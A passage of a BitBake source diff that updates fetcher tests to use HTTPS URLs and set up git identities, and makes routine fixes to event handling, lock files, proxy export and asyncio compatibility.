@@ -845,6 +898,8 @@ class FetcherNetworkTest(FetcherTest):
                                    prefix='gitfetch_localusehead_')
         src_dir = os.path.abspath(src_dir)
         bb.process.run("git init", cwd=src_dir)
+        bb.process.run("git config user.email 'you@example.com'", cwd=src_dir)
+        bb.process.run("git config user.name 'Your Name'", cwd=src_dir)
         bb.process.run("git commit --allow-empty -m'Dummy commit'",
                        cwd=src_dir)
         # Use other branch than master
@@ -918,7 +973,7 @@ class FetcherNetworkTest(FetcherTest):
     def test_git_submodule_dbus_broker(self):
         # The following external repositories have show failures in fetch and unpack operations
         # We want to avoid regressions!
-        url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main"
+        url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main"
         fetcher = bb.fetch.Fetch([url], self.d)
         fetcher.download()
         # Previous cwd has been deleted
@@ -934,7 +989,7 @@ class FetcherNetworkTest(FetcherTest):
 
     @skipIfNoNetwork()
     def test_git_submodule_CLI11(self):
-        url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf"
+        url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main"
         fetcher = bb.fetch.Fetch([url], self.d)
         fetcher.download()
         # Previous cwd has been deleted
@@ -949,12 +1004,12 @@ class FetcherNetworkTest(FetcherTest):
     @skipIfNoNetwork()
     def test_git_submodule_update_CLI11(self):
         """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """
-        url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714"
+        url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main"
         fetcher = bb.fetch.Fetch([url], self.d)
         fetcher.download()
 
         # CLI11 that pulls in a newer nlohmann-json
-        url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca"
+        url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main"
         fetcher = bb.fetch.Fetch([url], self.d)
         fetcher.download()
         # Previous cwd has been deleted
@@ -968,7 +1023,7 @@ class FetcherNetworkTest(FetcherTest):
 
     @skipIfNoNetwork()
     def test_git_submodule_aktualizr(self):
-        url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44"
+        url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44"
         fetcher = bb.fetch.Fetch([url], self.d)
         fetcher.download()
         # Previous cwd has been deleted
@@ -988,7 +1043,7 @@ class FetcherNetworkTest(FetcherTest):
         """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """
 
         # This repository also has submodules where the module (name), path and url do not align
-        url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699"
+        url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699;branch=main"
         fetcher = bb.fetch.Fetch([url], self.d)
         fetcher.download()
         # Previous cwd has been deleted
@@ -1046,7 +1101,7 @@ class SVNTest(FetcherTest):
 
         bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir)
         # Github will emulate SVN.  Use this to check if we're downloding...
-        bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .",
+        bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .",
                        cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
         bb.process.run("svn commit --non-interactive -m 'Add external'",
                        cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
@@ -1164,7 +1219,7 @@ class FetchLatestVersionTest(FetcherTest):
 
     test_git_uris = {
         # version pattern "X.Y.Z"
-        ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "")
+        ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "")
             : "1.99.4",
         # version pattern "vX.Y"
         # mirror of git.infradead.org since network issues interfered with testing
@@ -1175,7 +1230,7 @@ class FetchLatestVersionTest(FetcherTest):
         ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "")
             : "1.0",
         # version pattern "pkg_name-vX.Y.Z"
-        ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "")
+        ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "")
             : "1.4.0",
         # combination version pattern
         ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "")
@@ -1187,13 +1242,13 @@ class FetchLatestVersionTest(FetcherTest):
             : "20120614",
         # packages with a valid UPSTREAM_CHECK_GITTAGREGEX
                 # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing
-        ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P<pver>(\d+\.(\d\.?)*))")
+        ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P<pver>(\d+\.(\d\.?)*))")
             : "0.4.3",
-        ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P<pver>(([0-9][\.|_]?)+[0-9]))")
+        ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P<pver>(([0-9][\.|_]?)+[0-9]))")
             : "11.0.0",
-        ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P<pver>((\d+[\.\-_]*)+))")
+        ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P<pver>((\d+[\.\-_]*)+))")
             : "1.3.59",
-        ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))")
+        ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))")
             : "3.82+dbg0.9",
     }
 
@@ -1233,11 +1288,11 @@ class FetchLatestVersionTest(FetcherTest):
         #
         # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2
         # https://github.com/apple/cups/releases
-        ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz")
+        ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz")
             : "2.0.0",
         # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz
         # http://ftp.debian.org/debian/pool/main/d/db5.3/
-        ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz")
+        ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz")
             : "5.3.10",
     }
 
@@ -1283,13 +1338,10 @@ class FetchCheckStatusTest(FetcherTest):
                       "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.2.tar.gz",
                       "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.3.tar.gz",
                       "https://yoctoproject.org/",
-                      "https://yoctoproject.org/documentation",
+                      "https://docs.yoctoproject.org/",
                       "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz",
                       "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz",
                       "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz",
-                      "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz",
-                      "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz",
-                      "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz",
                       # GitHub releases are hosted on Amazon S3, which doesn't support HEAD
                       "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz"
                       ]
@@ -1328,6 +1380,8 @@ class GitMakeShallowTest(FetcherTest):
         self.gitdir = os.path.join(self.tempdir, 'gitshallow')
         bb.utils.mkdirhier(self.gitdir)
         bb.process.run('git init', cwd=self.gitdir)
+        bb.process.run('git config user.email "you@example.com"', cwd=self.gitdir)
+        bb.process.run('git config user.name "Your Name"', cwd=self.gitdir)
 
     def assertRefs(self, expected_refs):
         actual_refs = self.git(['for-each-ref', '--format=%(refname)']).splitlines()
@@ -1451,6 +1505,8 @@ class GitShallowTest(FetcherTest):
 
         bb.utils.mkdirhier(self.srcdir)
         self.git('init', cwd=self.srcdir)
+        self.git('config user.email "you@example.com"', cwd=self.srcdir)
+        self.git('config user.name "Your Name"', cwd=self.srcdir)
         self.d.setVar('WORKDIR', self.tempdir)
         self.d.setVar('S', self.gitdir)
         self.d.delVar('PREMIRRORS')
@@ -1532,6 +1588,7 @@ class GitShallowTest(FetcherTest):
 
         # fetch and unpack, from the shallow tarball
         bb.utils.remove(self.gitdir, recurse=True)
+        bb.process.run('chmod u+w -R "%s"' % ud.clonedir)
         bb.utils.remove(ud.clonedir, recurse=True)
         bb.utils.remove(ud.clonedir.replace('gitsource', 'gitsubmodule'), recurse=True)
 
@@ -1684,6 +1741,8 @@ class GitShallowTest(FetcherTest):
         smdir = os.path.join(self.tempdir, 'gitsubmodule')
         bb.utils.mkdirhier(smdir)
         self.git('init', cwd=smdir)
+        self.git('config user.email "you@example.com"', cwd=smdir)
+        self.git('config user.name "Your Name"', cwd=smdir)
         # Make this look like it was cloned from a remote...
         self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
         self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1691,7 +1750,7 @@ class GitShallowTest(FetcherTest):
         self.add_empty_file('bsub', cwd=smdir)
 
         self.git('submodule init', cwd=self.srcdir)
-        self.git('submodule add file://%s' % smdir, cwd=self.srcdir)
+        self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
         self.git('submodule update', cwd=self.srcdir)
         self.git('commit -m submodule -a', cwd=self.srcdir)
 
@@ -1714,6 +1773,8 @@ class GitShallowTest(FetcherTest):
         smdir = os.path.join(self.tempdir, 'gitsubmodule')
         bb.utils.mkdirhier(smdir)
         self.git('init', cwd=smdir)
+        self.git('config user.email "you@example.com"', cwd=smdir)
+        self.git('config user.name "Your Name"', cwd=smdir)
         # Make this look like it was cloned from a remote...
         self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
         self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1721,7 +1782,7 @@ class GitShallowTest(FetcherTest):
         self.add_empty_file('bsub', cwd=smdir)
 
         self.git('submodule init', cwd=self.srcdir)
-        self.git('submodule add file://%s' % smdir, cwd=self.srcdir)
+        self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
         self.git('submodule update', cwd=self.srcdir)
         self.git('commit -m submodule -a', cwd=self.srcdir)
 
@@ -1756,8 +1817,8 @@ class GitShallowTest(FetcherTest):
             self.git('annex init', cwd=self.srcdir)
             open(os.path.join(self.srcdir, 'c'), 'w').close()
             self.git('annex add c', cwd=self.srcdir)
-            self.git('commit -m annex-c -a', cwd=self.srcdir)
-            bb.process.run('chmod u+w -R %s' % os.path.join(self.srcdir, '.git', 'annex'))
+            self.git('commit --author "Foo Bar <foo@bar>" -m annex-c -a', cwd=self.srcdir)
+            bb.process.run('chmod u+w -R %s' % self.srcdir)
 
             uri = 'gitannex://%s;protocol=file;subdir=${S}' % self.srcdir
             fetcher, ud = self.fetch_shallow(uri)
@@ -1971,7 +2032,7 @@ class GitShallowTest(FetcherTest):
 
     @skipIfNoNetwork()
     def test_bitbake(self):
-        self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir)
+        self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir)
         self.git('config core.bare true', cwd=self.srcdir)
         self.git('fetch', cwd=self.srcdir)
 
@@ -2032,6 +2093,8 @@ class GitLfsTest(FetcherTest):
 
         bb.utils.mkdirhier(self.srcdir)
         self.git('init', cwd=self.srcdir)
+        self.git('config user.email "you@example.com"', cwd=self.srcdir)
+        self.git('config user.name "Your Name"', cwd=self.srcdir)
         with open(os.path.join(self.srcdir, '.gitattributes'), 'wt') as attrs:
             attrs.write('*.mp3 filter=lfs -text')
         self.git(['add', '.gitattributes'], cwd=self.srcdir)
@@ -2046,13 +2109,14 @@ class GitLfsTest(FetcherTest):
             cwd = self.gitdir
         return bb.process.run(cmd, cwd=cwd)[0]
 
-    def fetch(self, uri=None):
+    def fetch(self, uri=None, download=True):
         uris = self.d.getVar('SRC_URI').split()
         uri = uris[0]
         d = self.d
 
         fetcher = bb.fetch2.Fetch(uris, d)
-        fetcher.download()
+        if download:
+            fetcher.download()
         ud = fetcher.ud[uri]
         return fetcher, ud
 
@@ -2062,16 +2126,21 @@ class GitLfsTest(FetcherTest):
         uri = 'git://%s;protocol=file;subdir=${S};lfs=1' % self.srcdir
         self.d.setVar('SRC_URI', uri)
 
-        fetcher, ud = self.fetch()
+        # Careful: suppress initial attempt at downloading until
+        # we know whether git-lfs is installed.
+        fetcher, ud = self.fetch(uri=None, download=False)
         self.assertIsNotNone(ud.method._find_git_lfs)
 
-        # If git-lfs can be found, the unpack should be successful
-        ud.method._find_git_lfs = lambda d: True
-        shutil.rmtree(self.gitdir, ignore_errors=True)
-        fetcher.unpack(self.d.getVar('WORKDIR'))
+        # If git-lfs can be found, the unpack should be successful. Only
+        # attempt this with the real live copy of git-lfs installed.
+        if ud.method._find_git_lfs(self.d):
+            fetcher.download()
+            shutil.rmtree(self.gitdir, ignore_errors=True)
+            fetcher.unpack(self.d.getVar('WORKDIR'))
 
         # If git-lfs cannot be found, the unpack should throw an error
         with self.assertRaises(bb.fetch2.FetchError):
+            fetcher.download()
             ud.method._find_git_lfs = lambda d: False
             shutil.rmtree(self.gitdir, ignore_errors=True)
             fetcher.unpack(self.d.getVar('WORKDIR'))
@@ -2082,10 +2151,16 @@ class GitLfsTest(FetcherTest):
         uri = 'git://%s;protocol=file;subdir=${S};lfs=0' % self.srcdir
         self.d.setVar('SRC_URI', uri)
 
+        # In contrast to test_lfs_enabled(), allow the implicit download
+        # done by self.fetch() to occur here. The point of this test case
+        # is to verify that the fetcher can survive even if the source
+        # repository has Git LFS usage configured.
         fetcher, ud = self.fetch()
         self.assertIsNotNone(ud.method._find_git_lfs)
 
-        # If git-lfs can be found, the unpack should be successful
+        # If git-lfs can be found, the unpack should be successful. A
+        # live copy of git-lfs is not required for this case, so
+        # unconditionally forge its presence.
         ud.method._find_git_lfs = lambda d: True
         shutil.rmtree(self.gitdir, ignore_errors=True)
         fetcher.unpack(self.d.getVar('WORKDIR'))
diff --git a/bitbake/lib/bb/tinfoil.py b/bitbake/lib/bb/tinfoil.py
index 8c9b6b8ca5..8bec8cbaf6 100644
--- a/bitbake/lib/bb/tinfoil.py
+++ b/bitbake/lib/bb/tinfoil.py
@@ -53,6 +53,10 @@ class TinfoilDataStoreConnectorVarHistory:
     def remoteCommand(self, cmd, *args, **kwargs):
         return self.tinfoil.run_command('dataStoreConnectorVarHistCmd', self.dsindex, cmd, args, kwargs)
 
+    def emit(self, var, oval, val, o, d):
+        ret = self.tinfoil.run_command('dataStoreConnectorVarHistCmdEmit', self.dsindex, var, oval, val, d.dsindex)
+        o.write(ret)
+
     def __getattr__(self, name):
         if not hasattr(bb.data_smart.VariableHistory, name):
             raise AttributeError("VariableHistory has no such method %s" % name)
@@ -448,7 +452,7 @@ class Tinfoil:
         self.run_actions(config_params)
         self.recipes_parsed = True
 
-    def run_command(self, command, *params):
+    def run_command(self, command, *params, handle_events=True):
         """
         Run a command on the server (as implemented in bb.command).
         Note that there are two types of command - synchronous and
@@ -465,7 +469,16 @@ class Tinfoil:
         commandline = [command]
         if params:
             commandline.extend(params)
-        result = self.server_connection.connection.runCommand(commandline)
+        try:
+            result = self.server_connection.connection.runCommand(commandline)
+        finally:
+            while handle_events:
+                event = self.wait_event()
+                if not event:
+                    break
+                if isinstance(event, logging.LogRecord):
+                    if event.taskpid == 0 or event.levelno > logging.INFO:
+                        self.logger.handle(event)
         if result[1]:
             raise TinfoilCommandFailed(result[1])
         return result[0]
diff --git a/bitbake/lib/bb/ui/knotty.py b/bitbake/lib/bb/ui/knotty.py
index 87e873d644..d1f74389db 100644
--- a/bitbake/lib/bb/ui/knotty.py
+++ b/bitbake/lib/bb/ui/knotty.py
@@ -227,7 +227,9 @@ class TerminalFilter(object):
 
     def keepAlive(self, t):
         if not self.cuu:
-            print("Bitbake still alive (%ds)" % t)
+            print("Bitbake still alive (no events for %ds). Active tasks:" % t)
+            for t in self.helper.running_tasks:
+                print(t)
             sys.stdout.flush()
 
     def updateFooter(self):
@@ -380,14 +382,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo
               "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent",
               "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"]
 
+def drain_events_errorhandling(eventHandler):
+    # We don't have logging setup, we do need to show any events we see before exiting
+    event = True
+    logger = bb.msg.logger_create('bitbake', sys.stdout)
+    while event:
+        event = eventHandler.waitEvent(0)
+        if isinstance(event, logging.LogRecord):
+            logger.handle(event)
+
 def main(server, eventHandler, params, tf = TerminalFilter):
 
-    if not params.observe_only:
-        params.updateToServer(server, os.environ.copy())
+    try:
+        if not params.observe_only:
+            params.updateToServer(server, os.environ.copy())
 
-    includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only)
+        includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only)
 
-    loglevel, _ = bb.msg.constructLogOptions()
+        loglevel, _ = bb.msg.constructLogOptions()
+    except bb.BBHandledException:
+        drain_events_errorhandling(eventHandler)
+        return 1
 
     if params.options.quiet == 0:
         console_loglevel = loglevel
@@ -584,7 +599,8 @@ def main(server, eventHandler, params, tf = TerminalFilter):
     warnings = 0
     taskfailures = []
 
-    printinterval = 5000
+    printintervaldelta = 10 * 60 # 10 minutes
+    printinterval = printintervaldelta
     lastprint = time.time()
 
     termfilter = tf(main, helper, console_handlers, params.options.quiet)
@@ -594,7 +610,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
         try:
             if (lastprint + printinterval) <= time.time():
                 termfilter.keepAlive(printinterval)
-                printinterval += 5000
+                printinterval += printintervaldelta
             event = eventHandler.waitEvent(0)
             if event is None:
                 if main.shutdown > 1:
@@ -625,7 +641,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
 
             if isinstance(event, logging.LogRecord):
                 lastprint = time.time()
-                printinterval = 5000
+                printinterval = printintervaldelta
                 if event.levelno >= bb.msg.BBLogFormatter.ERROR:
                     errors = errors + 1
                     return_value = 1
diff --git a/bitbake/lib/bb/ui/taskexp.py b/bitbake/lib/bb/ui/taskexp.py
index 05e32338c2..c00eaf6638 100644
--- a/bitbake/lib/bb/ui/taskexp.py
+++ b/bitbake/lib/bb/ui/taskexp.py
@@ -8,6 +8,7 @@
 #
 
 import sys
+import traceback
 
 try:
     import gi
@@ -58,7 +59,12 @@ class PackageReverseDepView(Gtk.TreeView):
         self.current = None
         self.filter_model = model.filter_new()
         self.filter_model.set_visible_func(self._filter)
-        self.sort_model = self.filter_model.sort_new_with_model()
+        # The introspected API was fixed but we can't rely on a pygobject that hides this.
+        # https://gitlab.gnome.org/GNOME/pygobject/-/commit/9cdbc56fbac4db2de78dc080934b8f0a7efc892a
+        if hasattr(Gtk.TreeModelSort, "new_with_model"):
+            self.sort_model = Gtk.TreeModelSort.new_with_model(self.filter_model)
+        else:
+            self.sort_model = self.filter_model.sort_new_with_model()
         self.sort_model.set_sort_column_id(COL_DEP_PARENT, Gtk.SortType.ASCENDING)
         self.set_model(self.sort_model)
         self.append_column(Gtk.TreeViewColumn(label, Gtk.CellRendererText(), text=COL_DEP_PARENT))
@@ -191,6 +197,7 @@ def main(server, eventHandler, params):
     gtkgui.start()
 
     try:
+        params.updateToServer(server, os.environ.copy())
         params.updateFromServer(server)
         cmdline = params.parseActions()
         if not cmdline:
@@ -213,6 +220,9 @@ def main(server, eventHandler, params):
     except client.Fault as x:
         print("XMLRPC Fault getting commandline:\n %s" % x)
         return
+    except Exception as e:
+        print("Exception in startup:\n %s" % traceback.format_exc())
+        return
 
     if gtkthread.quit.isSet():
         return
diff --git a/bitbake/lib/bb/utils.py b/bitbake/lib/bb/utils.py
index 5f5767c1da..34fa0b7a67 100644
--- a/bitbake/lib/bb/utils.py
+++ b/bitbake/lib/bb/utils.py
@@ -16,7 +16,8 @@ import bb.msg
 import multiprocessing
 import fcntl
 import importlib
-from importlib import machinery
+import importlib.machinery
+import importlib.util
 import itertools
 import subprocess
 import glob
@@ -420,12 +421,14 @@ def better_eval(source, locals, extraglobals = None):
     return eval(source, ctx, locals)
 
 @contextmanager
-def fileslocked(files):
+def fileslocked(files, *args, **kwargs):
     """Context manager for locking and unlocking file locks."""
     locks = []
     if files:
         for lockfile in files:
-            locks.append(bb.utils.lockfile(lockfile))
+            l = bb.utils.lockfile(lockfile, *args, **kwargs)
+            if l is not None:
+                locks.append(l)
 
     try:
         yield
@@ -458,9 +461,16 @@ def lockfile(name, shared=False, retry=True, block=False):
     consider the possibility of sending a signal to the process to break
     out - at which point you want block=True rather than retry=True.
     """
+    basename = os.path.basename(name)
+    if len(basename) > 255:
+        root, ext = os.path.splitext(basename)
+        basename = root[:255 - len(ext)] + ext
+
     dirname = os.path.dirname(name)
     mkdirhier(dirname)
 
+    name = os.path.join(dirname, basename)
+
     if not os.access(dirname, os.W_OK):
         logger.error("Unable to acquire lock '%s', directory is not writable",
                      name)
@@ -494,7 +504,7 @@ def lockfile(name, shared=False, retry=True, block=False):
                     return lf
             lf.close()
         except OSError as e:
-            if e.errno == errno.EACCES:
+            if e.errno == errno.EACCES or e.errno == errno.ENAMETOOLONG:
                 logger.error("Unable to acquire lock '%s', %s",
                              e.strerror, name)
                 sys.exit(1)
@@ -959,6 +969,17 @@ def which(path, item, direction = 0, history = False, executable=False):
         return "", hist
     return ""
 
+@contextmanager
+def umask(new_mask):
+    """
+    Context manager to set the umask to a specific mask, and restore it afterwards.
+    """
+    current_mask = os.umask(new_mask)
+    try:
+        yield
+    finally:
+        os.umask(current_mask)
+
 def to_boolean(string, default=None):
     if not string:
         return default
@@ -1560,21 +1581,22 @@ def set_process_name(name):
 
 # export common proxies variables from datastore to environment
 def export_proxies(d):
-    import os
+    """ export common proxies variables from datastore to environment """
 
     variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY',
                     'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY',
-                    'GIT_PROXY_COMMAND']
+                    'GIT_PROXY_COMMAND', 'SSL_CERT_FILE', 'SSL_CERT_DIR']
     exported = False
 
-    for v in variables:
-        if v in os.environ.keys():
+    origenv = d.getVar("BB_ORIGENV")
+
+    for name in variables:
+        value = d.getVar(name)
+        if not value and origenv:
+            value = origenv.getVar(name)
+        if value:
+            os.environ[name] = value
             exported = True
-        else:
-            v_proxy = d.getVar(v)
-            if v_proxy is not None:
-                os.environ[v] = v_proxy
-                exported = True
 
     return exported
 
@@ -1584,7 +1606,9 @@ def load_plugins(logger, plugins, pluginpath):
         logger.debug(1, 'Loading plugin %s' % name)
         spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
         if spec:
-            return spec.loader.load_module()
+            mod = importlib.util.module_from_spec(spec)
+            spec.loader.exec_module(mod)
+            return mod
 
     logger.debug(1, 'Loading plugins from %s...' % pluginpath)
 
diff --git a/bitbake/lib/bblayers/action.py b/bitbake/lib/bblayers/action.py
index d6459d6617..d2f9c1bbde 100644
--- a/bitbake/lib/bblayers/action.py
+++ b/bitbake/lib/bblayers/action.py
@@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin):
             if not (args.force or notadded):
                 try:
                     self.tinfoil.run_command('parseConfiguration')
-                except bb.tinfoil.TinfoilUIException:
+                except (bb.tinfoil.TinfoilUIException, bb.BBHandledException):
                     # Restore the back up copy of bblayers.conf
                     shutil.copy2(backup, bblayers_conf)
-                    bb.fatal("Parse failure with the specified layer added")
+                    bb.fatal("Parse failure with the specified layer added, aborting.")
                 else:
                     for item in notadded:
                         sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item)
diff --git a/bitbake/lib/bblayers/layerindex.py b/bitbake/lib/bblayers/layerindex.py
index 95b67a6621..f64d18e819 100644
--- a/bitbake/lib/bblayers/layerindex.py
+++ b/bitbake/lib/bblayers/layerindex.py
@@ -206,6 +206,7 @@ class LayerIndexPlugin(ActionPlugin):
 """
         args.show_only = True
         args.ignore = []
+        args.shallow = True
         self.do_layerindex_fetch(args)
 
     def register_commands(self, sp):
diff --git a/bitbake/lib/bblayers/query.py b/bitbake/lib/bblayers/query.py
index e2cc310532..652a3acce0 100644
--- a/bitbake/lib/bblayers/query.py
+++ b/bitbake/lib/bblayers/query.py
@@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix.
         def print_item(f, pn, ver, layer, ispref):
             if not selected_layer or layer == selected_layer:
                 if not bare and f in skiplist:
-                    skipped = ' (skipped)'
+                    skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason
                 else:
                     skipped = ''
                 if show_filenames:
@@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies.
                     line = fnfile.readline()
 
         # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass
-        conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$")
-        inc_re = re.compile(".*\.inc$")
+        conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$")
+        inc_re = re.compile(r".*\.inc$")
         # The "inherit xxx" in .bbclass
-        bbclass_re = re.compile(".*\.bbclass$")
+        bbclass_re = re.compile(r".*\.bbclass$")
         for layerdir in self.bblayers:
             layername = self.get_layer_name(layerdir)
             for dirpath, dirnames, filenames in os.walk(layerdir):
diff --git a/bitbake/lib/hashserv/server.py b/bitbake/lib/hashserv/server.py
index 81050715ea..f38a22ad92 100644
--- a/bitbake/lib/hashserv/server.py
+++ b/bitbake/lib/hashserv/server.py
@@ -12,6 +12,7 @@ import math
 import os
 import signal
 import socket
+import sys
 import time
 from . import chunkify, DEFAULT_MAX_CHUNK
 
@@ -419,9 +420,14 @@ class Server(object):
         self._cleanup_socket = None
 
     def start_tcp_server(self, host, port):
-        self.server = self.loop.run_until_complete(
-            asyncio.start_server(self.handle_client, host, port, loop=self.loop)
-        )
+        if sys.version_info[0] == 3 and sys.version_info[1] < 6:
+            self.server = self.loop.run_until_complete(
+                asyncio.start_server(self.handle_client, host, port, loop=self.loop)
+            )
+        else:
+            self.server = self.loop.run_until_complete(
+                asyncio.start_server(self.handle_client, host, port)
+            )
 
         for s in self.server.sockets:
             logger.info('Listening on %r' % (s.getsockname(),))
@@ -444,9 +450,14 @@ class Server(object):
         try:
             # Work around path length limits in AF_UNIX
             os.chdir(os.path.dirname(path))
-            self.server = self.loop.run_until_complete(
-                asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop)
-            )
+            if sys.version_info[0] == 3 and sys.version_info[1] < 6:
+                self.server = self.loop.run_until_complete(
+                    asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop)
+                )
+            else:
+                self.server = self.loop.run_until_complete(
+                    asyncio.start_unix_server(self.handle_client, os.path.basename(path))
+                )
         finally:
             os.chdir(cwd)
 
diff --git a/bitbake/lib/layerindexlib/__init__.py b/bitbake/lib/layerindexlib/__init__.py
index 77196b408f..f30ee9e259 100644
--- a/bitbake/lib/layerindexlib/__init__.py
+++ b/bitbake/lib/layerindexlib/__init__.py
@@ -6,7 +6,6 @@
 import datetime
 
 import logging
-import imp
 
 from collections import OrderedDict
 from layerindexlib.plugin import LayerIndexPluginUrlError
diff --git a/bitbake/lib/toaster/toastergui/api.py b/bitbake/lib/toaster/toastergui/api.py
index b4cdc335ef..e367bd910e 100644
--- a/bitbake/lib/toaster/toastergui/api.py
+++ b/bitbake/lib/toaster/toastergui/api.py
